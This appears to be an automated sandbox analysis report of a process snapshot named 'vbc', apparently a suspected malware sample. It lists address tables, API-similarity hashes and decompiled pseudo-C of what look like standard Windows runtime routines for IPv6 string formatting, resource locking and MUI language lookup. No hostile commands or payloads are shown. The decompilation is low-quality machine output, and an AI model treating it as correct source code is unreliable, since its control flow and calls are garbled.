                                                    0x00908788
                                                    0x00908791
                                                    0x00908794
                                                    0x00908798
                                                    0x0090879b
                                                    0x0090879e
                                                    0x009087a1
                                                    0x009087a4
                                                    0x009087a7
                                                    0x009087aa
                                                    0x009087af
                                                    0x00951ad3
                                                    0x00908b0a
                                                    0x00908b0d
                                                    0x00908b13
                                                    0x00908b19
                                                    0x00908b1f
                                                    0x00908b25
                                                    0x00908b2b
                                                    0x00908b31
                                                    0x00908b37
                                                    0x00908b3d
                                                    0x00908b46
                                                    0x00908b46
                                                    0x009087c6
                                                    0x009087d0
                                                    0x00951ae0
                                                    0x00951ae6
                                                    0x00951af8
                                                    0x00951af8
                                                    0x00951afd
                                                    0x00951afe
                                                    0x00951b01
                                                    0x00951b06
                                                    0x00951b06
                                                    0x009087d6
                                                    0x009087f2
                                                    0x009087f7
                                                    0x00908807
                                                    0x0090880a
                                                    0x0090880f
                                                    0x00908810
                                                    0x00908813
                                                    0x00908818
                                                    0x00908818
                                                    0x0090882c
                                                    0x00908831
                                                    0x00908838
                                                    0x00908908
                                                    0x00908920
                                                    0x009089f0
                                                    0x00908a08
                                                    0x00908af6
                                                    0x00908af6
                                                    0x00908af8
                                                    0x00908afb
                                                    0x00951beb
                                                    0x00951beb
                                                    0x00908b04
                                                    0x00951bf8
                                                    0x00951c0e
                                                    0x00951c13
                                                    0x00951c16
                                                    0x00951c16
                                                    0x00951bf8
                                                    0x00000000
                                                    0x00908b04
                                                    0x00908a0e
                                                    0x00908a11
                                                    0x00908a14
                                                    0x00908a15
                                                    0x00908a18
                                                    0x00908a22
                                                    0x00908b59
                                                    0x00908a28
                                                    0x00908a3c
                                                    0x00908a3c
                                                    0x00908a42
                                                    0x00951bb0
                                                    0x00951b11
                                                    0x00951b11
                                                    0x00000000
                                                    0x00908a48
                                                    0x00908a51
                                                    0x00908a5b
                                                    0x00908a5e
                                                    0x00908a61
                                                    0x00908a69
                                                    0x00908a69
                                                    0x00908a6d
                                                    0x00000000
                                                    0x00000000
                                                    0x00908a74
                                                    0x00908a7c
                                                    0x00908a7d
                                                    0x00908a91
                                                    0x00908a93
                                                    0x00908a93
                                                    0x00908a98
                                                    0x00908a9b
                                                    0x00908aa1
                                                    0x00908aa1
                                                    0x00908aa4
                                                    0x00908aaa
                                                    0x00908ab1
                                                    0x00908ac5
                                                    0x00908ac7
                                                    0x00908ac7
                                                    0x00908ac5
                                                    0x00908ace
                                                    0x00951bc9
                                                    0x00951bce
                                                    0x00951bd2
                                                    0x00951bd2
                                                    0x00908ad8
                                                    0x00908aeb
                                                    0x00908aeb
                                                    0x00908af0
                                                    0x00908af4
                                                    0x00000000
                                                    0x00908af4
                                                    0x00908a42
                                                    0x00908926
                                                    0x00908929
                                                    0x0090892c
                                                    0x0090892d
                                                    0x00908930
                                                    0x00908935
                                                    0x0090893a
                                                    0x00908b51
                                                    0x00908940
                                                    0x00908954
                                                    0x00908954
                                                    0x0090895a
                                                    0x00951b63
                                                    0x00000000
                                                    0x00908960
                                                    0x00908969
                                                    0x00908973
                                                    0x00908976
                                                    0x00908979
                                                    0x0090897e
                                                    0x00908981
                                                    0x00908981
                                                    0x00908986
                                                    0x00000000
                                                    0x00000000
                                                    0x00951b6e
                                                    0x00951b74
                                                    0x00951b7b
                                                    0x00951b8f
                                                    0x00951b91
                                                    0x00951b91
                                                    0x00951b99
                                                    0x00951b9c
                                                    0x00951ba2
                                                    0x00951ba2
                                                    0x0090898c
                                                    0x00908992
                                                    0x00908999
                                                    0x009089ad
                                                    0x00951ba8
                                                    0x00951ba8
                                                    0x009089ad
                                                    0x009089b6
                                                    0x009089c8
                                                    0x009089cd
                                                    0x009089d0
                                                    0x009089d0
                                                    0x009089d6
                                                    0x009089e8
                                                    0x009089e8
                                                    0x009089ed
                                                    0x00000000
                                                    0x009089ed
                                                    0x0090895a
                                                    0x0090883e
                                                    0x00908841
                                                    0x00908844
                                                    0x00908845
                                                    0x00908848
                                                    0x0090884d
                                                    0x00908852
                                                    0x00908b49
                                                    0x00908858
                                                    0x0090886c
                                                    0x0090886c
                                                    0x00908872
                                                    0x00951b0e
                                                    0x00000000
                                                    0x00908878
                                                    0x00908881
                                                    0x0090888b
                                                    0x0090888e
                                                    0x00908891
                                                    0x00908896
                                                    0x00908899
                                                    0x00908899
                                                    0x0090889e
                                                    0x00000000
                                                    0x00000000
                                                    0x00951b21
                                                    0x00951b27
                                                    0x00951b2e
                                                    0x00951b42
                                                    0x00951b44
                                                    0x00951b44
                                                    0x00951b4c
                                                    0x00951b4f
                                                    0x00951b55
                                                    0x00951b55
                                                    0x009088a4
                                                    0x009088aa
                                                    0x009088b1
                                                    0x009088c5
                                                    0x00951b5b
                                                    0x00951b5b
                                                    0x009088c5
                                                    0x009088ce
                                                    0x009088e0
                                                    0x009088e5
                                                    0x009088e8
                                                    0x009088e8
                                                    0x009088ee
                                                    0x00908900
                                                    0x00908900
                                                    0x00908905
                                                    0x00000000
                                                    0x00908905

                                                    APIs
                                                    Strings
                                                    • Kernel-MUI-Language-SKU, xrefs: 009089FC
                                                    • WindowsExcludedProcs, xrefs: 009087C1
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00908827
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00908914
                                                    • Kernel-MUI-Number-Allowed, xrefs: 009087E6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                    • Instruction ID: d5b8b31f5906aec0b39d198ffaf365a0d44bee7c5842811dc6851a4495d599da
                                                    • Opcode Fuzzy Hash: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                    • Instruction Fuzzy Hash: 01F1F8B2D00649EFCF11EF99C981AEEBBB8FF08300F14446AE515E7251EB349A45DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009213CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E009213CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8e2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8e9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00917707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00917707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00917707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00917707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                    0x009213d5
                                                    0x009213d9
                                                    0x009213dc
                                                    0x009213de
                                                    0x009213e1
                                                    0x009213e8
                                                    0x009213ee
                                                    0x0094e8fd
                                                    0x00000000
                                                    0x0094e921
                                                    0x0094e921
                                                    0x0094e928
                                                    0x0094e982
                                                    0x0094e98a
                                                    0x00000000
                                                    0x0094e99a
                                                    0x0094e99e
                                                    0x0094e9a3
                                                    0x0094e9a8
                                                    0x0094e9b9
                                                    0x0094e978
                                                    0x00000000
                                                    0x0094e978
                                                    0x0094e98a
                                                    0x0094e92a
                                                    0x0094e931
                                                    0x0094e944
                                                    0x0094e944
                                                    0x0094e950
                                                    0x0094e954
                                                    0x0094e959
                                                    0x0094e95e
                                                    0x0094e963
                                                    0x0094e970
                                                    0x00000000
                                                    0x0094e975
                                                    0x0094e93b
                                                    0x0094e980
                                                    0x00000000
                                                    0x0094e980
                                                    0x0094e942
                                                    0x0094e94b
                                                    0x00000000
                                                    0x0094e94b
                                                    0x00000000
                                                    0x0094e942
                                                    0x009213f4
                                                    0x009213f4
                                                    0x009213f9
                                                    0x009213fc
                                                    0x009213ff
                                                    0x00921406
                                                    0x0094e9cc
                                                    0x0094e9d2
                                                    0x0094e9d2
                                                    0x0094e9cc
                                                    0x0092140c
                                                    0x00921411
                                                    0x00921431
                                                    0x0092143a
                                                    0x0092143c
                                                    0x0092143f
                                                    0x0092143f
                                                    0x00921442
                                                    0x00921447
                                                    0x009214a8
                                                    0x009214ac
                                                    0x0094e9e2
                                                    0x0094e9e7
                                                    0x0094e9ec
                                                    0x0094ea05
                                                    0x0094ea05
                                                    0x00000000
                                                    0x00921449
                                                    0x00000000
                                                    0x00921449
                                                    0x0092144c
                                                    0x00921459
                                                    0x00921462
                                                    0x00921469
                                                    0x0092146a
                                                    0x00921470
                                                    0x00921473
                                                    0x00921476
                                                    0x00921476
                                                    0x00921490
                                                    0x00921495
                                                    0x0092138e
                                                    0x00921390
                                                    0x00921397
                                                    0x00921398
                                                    0x00921399
                                                    0x009213a1
                                                    0x009213a4
                                                    0x009213a4
                                                    0x00921498
                                                    0x0092149c
                                                    0x0092149f
                                                    0x009214a2
                                                    0x00000000
                                                    0x00000000
                                                    0x009214a4
                                                    0x00000000
                                                    0x009214a4
                                                    0x00921413
                                                    0x00921415
                                                    0x00921416
                                                    0x00921419
                                                    0x0092141c
                                                    0x00921422
                                                    0x009213b7
                                                    0x009213bc
                                                    0x009213bf
                                                    0x009213bf
                                                    0x009213c2
                                                    0x00921424
                                                    0x00921424
                                                    0x00921424
                                                    0x00921427
                                                    0x0092142b
                                                    0x0092142c
                                                    0x0092142c
                                                    0x0092142c
                                                    0x00000000
                                                    0x0092141c
                                                    0x00921411

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                    • Instruction ID: fa12d8b7a289918ab0646b0c93a12e58c6cad99d3e65512d48ca47a8b15c9844
                                                    • Opcode Fuzzy Hash: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                    • Instruction Fuzzy Hash: 1B614B71A04665A6CF34DF99D8808BEBBBAFFE5300B14C42DF4DA47684D374AA50CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00920554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 49%
                                                    			E00920554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
									_push(_t144);
									_push(0);
									_t51 = E008DF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00924FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00933F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0096217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00933F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00923915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
												_push(_t138);
												_push(0);
												_t58 = E008DF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00924FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0096217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00933F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00923915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00905384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L008DF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00923915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L008DF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00923915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L008DF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00923915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00905329(_t110, _t138);
																return E009053A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                    0x0092055a
                                                    0x0092055d
                                                    0x00920563
                                                    0x00920566
                                                    0x009205d8
                                                    0x009205e2
                                                    0x009205e5
                                                    0x00000000
                                                    0x009205e7
                                                    0x009205e7
                                                    0x009205ea
                                                    0x009205f3
                                                    0x009205f3
                                                    0x00920568
                                                    0x00920568
                                                    0x00920568
                                                    0x00920569
                                                    0x00920569
                                                    0x00920569
                                                    0x0092056b
                                                    0x00000000
                                                    0x00000000
                                                    0x0094217f
                                                    0x00942183
                                                    0x0094225b
                                                    0x0094225f
                                                    0x00942189
                                                    0x0094218c
                                                    0x0094218f
                                                    0x00942194
                                                    0x00942199
                                                    0x0094219d
                                                    0x009421a0
                                                    0x009421a2
                                                    0x009421ce
                                                    0x009421ce
                                                    0x009421ce
                                                    0x009421d0
                                                    0x009421d6
                                                    0x009421de
                                                    0x009421e2
                                                    0x009421e8
                                                    0x009421e9
                                                    0x009421ec
                                                    0x009421f1
                                                    0x009421f6
                                                    0x00000000
                                                    0x00000000
                                                    0x009421f8
                                                    0x009421fb
                                                    0x00942206
                                                    0x0094220b
                                                    0x0094220c
                                                    0x00942217
                                                    0x00942226
                                                    0x0094222b
                                                    0x0094222c
                                                    0x0094222f
                                                    0x00942232
                                                    0x00942235
                                                    0x00942235
                                                    0x0094223a
                                                    0x0094223f
                                                    0x00942241
                                                    0x00942243
                                                    0x00942248
                                                    0x00942248
                                                    0x0094224d
                                                    0x0094224f
                                                    0x00942262
                                                    0x00942263
                                                    0x00942268
                                                    0x00942269
                                                    0x00942269
                                                    0x00942269
                                                    0x0094226d
                                                    0x00000000
                                                    0x00000000
                                                    0x00942276
                                                    0x00942279
                                                    0x0094227e
                                                    0x00942283
                                                    0x00942287
                                                    0x0094228a
                                                    0x0094228d
                                                    0x0094228f
                                                    0x009422bc
                                                    0x009422bc
                                                    0x009422bc
                                                    0x009422be
                                                    0x009422c4
                                                    0x009422cc
                                                    0x009422d0
                                                    0x009422d6
                                                    0x009422d7
                                                    0x009422da
                                                    0x009422df
                                                    0x009422e4
                                                    0x00000000
                                                    0x00000000
                                                    0x009422e6
                                                    0x009422e9
                                                    0x009422f4
                                                    0x009422f9
                                                    0x009422fa
                                                    0x00942305
                                                    0x00942314
                                                    0x00942319
                                                    0x0094231a
                                                    0x0094231d
                                                    0x00942320
                                                    0x00942323
                                                    0x00942323
                                                    0x00942328
                                                    0x0094232d
                                                    0x0094232f
                                                    0x00942331
                                                    0x00942336
                                                    0x00942336
                                                    0x0094233b
                                                    0x0094233d
                                                    0x00942350
                                                    0x00942351
                                                    0x00942356
                                                    0x00942359
                                                    0x00942359
                                                    0x0094235b
                                                    0x0094235d
                                                    0x00905367
                                                    0x0090536b
                                                    0x00905372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00942363
                                                    0x00942363
                                                    0x00942369
                                                    0x0094236a
                                                    0x0094236c
                                                    0x00942371
                                                    0x00942373
                                                    0x00000000
                                                    0x00942379
                                                    0x00942379
                                                    0x0094237a
                                                    0x0094237f
                                                    0x0094237f
                                                    0x00942385
                                                    0x00942386
                                                    0x00942389
                                                    0x0094238e
                                                    0x00942390
                                                    0x00905378
                                                    0x0090537c
                                                    0x00942396
                                                    0x00942396
                                                    0x00942397
                                                    0x0094239c
                                                    0x009423a2
                                                    0x009423a3
                                                    0x009423a6
                                                    0x009423ab
                                                    0x009423ad
                                                    0x00000000
                                                    0x009423b3
                                                    0x009423b3
                                                    0x009423b4
                                                    0x009423b9
                                                    0x009423ba
                                                    0x009423ba
                                                    0x009423bc
                                                    0x009423bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00939153
                                                    0x00939158
                                                    0x0093915a
                                                    0x0093915e
                                                    0x00939160
                                                    0x00000000
                                                    0x00939166
                                                    0x00939166
                                                    0x00939171
                                                    0x00939176
                                                    0x00939176
                                                    0x00000000
                                                    0x00939160
                                                    0x009423c6
                                                    0x009423d7
                                                    0x009423d7
                                                    0x009423ad
                                                    0x00942390
                                                    0x00942373
                                                    0x0094233f
                                                    0x0094233f
                                                    0x00000000
                                                    0x0094233f
                                                    0x00942291
                                                    0x00942291
                                                    0x00942293
                                                    0x00942295
                                                    0x0094229a
                                                    0x009422a1
                                                    0x009422a3
                                                    0x009422a7
                                                    0x009422a9
                                                    0x00000000
                                                    0x00000000
                                                    0x009422ab
                                                    0x009422ad
                                                    0x009422af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009422af
                                                    0x009422b1
                                                    0x009422b4
                                                    0x009422b4
                                                    0x009422b6
                                                    0x009053be
                                                    0x009053be
                                                    0x009053be
                                                    0x009053c0
                                                    0x00000000
                                                    0x00000000
                                                    0x009053cb
                                                    0x009053ce
                                                    0x009053d0
                                                    0x009053d4
                                                    0x009053d6
                                                    0x00000000
                                                    0x009053d8
                                                    0x009053e3
                                                    0x009053ea
                                                    0x009053ea
                                                    0x00000000
                                                    0x009053d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009422b6
                                                    0x00000000
                                                    0x0094228f
                                                    0x00942349
                                                    0x0094234d
                                                    0x00942251
                                                    0x00942251
                                                    0x00000000
                                                    0x00942251
                                                    0x009421a4
                                                    0x009421a4
                                                    0x009421a6
                                                    0x009421a8
                                                    0x009421ac
                                                    0x009421b6
                                                    0x009421b8
                                                    0x009421bc
                                                    0x009421be
                                                    0x00000000
                                                    0x00000000
                                                    0x009421c0
                                                    0x009421c2
                                                    0x009421c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009421c4
                                                    0x009421c6
                                                    0x009421c6
                                                    0x009421c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009421c8
                                                    0x009421a2
                                                    0x00000000
                                                    0x00942183
                                                    0x0092057b
                                                    0x0092057d
                                                    0x00920581
                                                    0x00920583
                                                    0x00942178
                                                    0x00000000
                                                    0x00920589
                                                    0x0092058f
